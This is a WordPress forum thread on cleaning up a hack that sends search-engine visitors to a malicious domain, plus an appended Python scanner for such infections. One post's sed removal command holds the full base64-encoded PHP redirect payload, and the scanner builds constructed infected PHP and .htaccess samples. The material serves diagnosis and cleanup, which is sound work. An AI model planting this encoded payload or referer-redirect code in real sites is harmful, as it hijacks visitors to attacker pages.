
Hacked… but only through Google?

  • esmi

    @esmi

    Forum Moderator

    I had this same issue; fortunately it was very easy to track down on my site. Check your wp-config.php file and look for a line that starts with “eval(base64_decode” – delete this code all the way to the semicolon at the end of the line. Assuming the hacker didn’t do additional damage, this should fix your issue.

    To prevent further issues I would make sure that you upgrade WordPress and all plugins and be sure to change all usernames and passwords.

    If you need any additional help, feel free to contact me.

    This hack could be caused by two things, Ken is correct that a base64 injection is one of them. A hack like this would cause the problem you are seeing, it may be in one or more files however.

    The other option, which I think it would be, is via a .htaccess modification, sending users coming from search engines to malicious domains.
    To fix this, you can simply look in the .htaccess file and remove the code. It seems more likely this is your culprit after scanning over your site.

    Best Regards,
    David G.
    http://www.dittodot.com

    It’s probably on more than one file, it’s probably on all php files in the directory. With shell access:

    cd /path/to/wordpress/install/
    grep -r base64 ./*

    If you see something like the following, then it’s redirecting:
    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbm..."));

    This above is the shortened encoded code. The output of the code is actually:

    [Code moderated]

    The site will respond normally if you hit it directly. If it comes from one of the referers (google, yahoo, myspace, facebook, etc) it’ll be redirected to the costabrava-dot-bee-dot-pl web site.

    Getting rid of the code:
    sed -i 's/eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw\/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));//g' ./*.php

    Be very careful with the above. Don’t adjust it if you are lost/uncertain. In which case, it may be easier to restore from backup.

    Afterwards, spend some time hardening the site with the links above. Especially checking extensions.

    HTH

    Thanks,
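The two infection patterns described in this thread (an eval(base64_decode("...")) wrapper whose decoded body redirects visitors arriving from search engines, and a .htaccess RewriteCond on HTTP_REFERER feeding an external RewriteRule) can be checked for without running anything the attacker left behind. The scanner below is an added example, not code from any of the posters; it decodes the base64 payload offline and reports the indicators the posts mention (HTTP_REFERER checks, a Location header, search-engine names), and it strips the wrapper the way the sed one-liner does. The sample PHP, .htaccess and the redirect-target.invalid domain are constructed for the example.

```python
from __future__ import annotations
import base64
import re

# Constructed sample: a PHP file carrying an eval(base64_decode(...)) wrapper whose
# decoded body redirects search-engine visitors (placeholder domain, not a real one).
_PAYLOAD_PHP = (
    "error_reporting(0);\n"
    "$referer=$_SERVER['HTTP_REFERER'];\n"
    "if (stristr($referer,\"google\") or stristr($referer,\"yahoo\")) {\n"
    "header(\"Location: http://redirect-target.invalid/\");\n"
    "exit();\n"
    "}\n"
)
SAMPLE_INFECTED_PHP = (
    '<?php eval(base64_decode("'
    + base64.b64encode(_PAYLOAD_PHP.encode()).decode()
    + '")); ?>\n<?php // rest of a normal template ?>\n'
)
# Constructed sample: legitimate use of base64_decode without eval (should not match).
SAMPLE_CLEAN_PHP = "<?php\n$blob = base64_decode($_POST['blob'] ?? ''); // no eval\n"
# Constructed sample: .htaccess that redirects only referred search-engine traffic.
SAMPLE_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} (google|yahoo|bing)\\. [NC]\n"
    "RewriteRule .* http://redirect-target.invalid/ [R,L]\n"
)

# eval(base64_decode("<base64>")); with optional whitespace and trailing semicolon.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?'
)
REDIRECT_HINTS = ("HTTP_REFERER", 'header("Location', "header('Location")
ENGINES = ("google", "yahoo", "bing", "msn", "aol", "facebook", "myspace")


def decode_payload(b64: str) -> str:
    """Decode the base64 body; returns '' if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def scan_php(text: str) -> list[dict]:
    """Report each eval(base64_decode()) wrapper and what its decoded body does."""
    findings = []
    for m in EVAL_B64.finditer(text):
        decoded = decode_payload(m.group(1))
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "span": m.span(),
            "referer_redirect": any(h in decoded for h in REDIRECT_HINTS),
            "engines": sorted(e for e in ENGINES if e in decoded.lower()),
        })
    return findings


def scan_htaccess(text: str) -> list[dict]:
    """Pair each RewriteCond on HTTP_REFERER with the RewriteRule it guards."""
    findings = []
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if not re.match(r"\s*RewriteCond\s+%\{HTTP_REFERER\}", line, re.I):
            continue
        for j in range(i + 1, len(lines)):  # conditions may stack before the rule
            nxt = lines[j]
            if re.match(r"\s*RewriteRule\b", nxt, re.I):
                findings.append({
                    "cond_line": i + 1,
                    "rule_line": j + 1,
                    "external_target": bool(re.search(r"https?://", nxt)),
                    "redirect_flag": bool(re.search(r"\[[^\]]*\bR(=\d+)?\b", nxt)),
                })
                break
            if not re.match(r"\s*RewriteCond\b", nxt, re.I):
                break
    return findings


def strip_eval_wrapper(text: str) -> tuple[str, int]:
    """Remove every eval(base64_decode("...")); occurrence; returns (cleaned, count)."""
    return EVAL_B64.subn("", text)


if __name__ == "__main__":
    for f in scan_php(SAMPLE_INFECTED_PHP):
        print("php: line %d, referer redirect=%s, engines=%s"
              % (f["line"], f["referer_redirect"], f["engines"]))
    for h in scan_htaccess(SAMPLE_HTACCESS):
        print("htaccess: RewriteCond line %d -> RewriteRule line %d (external=%s, R flag=%s)"
              % (h["cond_line"], h["rule_line"], h["external_target"], h["redirect_flag"]))
    cleaned, n = strip_eval_wrapper(SAMPLE_INFECTED_PHP)
    print("removed %d wrapper(s); base64_decode still present: %s" % (n, "base64_decode" in cleaned))
```

Run scan_php over the output of a recursive read of every .php file and scan_htaccess over each .htaccess; a hit with referer_redirect set is the "fine when visited directly, redirected from Google" behaviour the thread describes. Only apply strip_eval_wrapper to a copy, compare the diff, and keep a backup, for the same reason the sed post warns to be careful.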
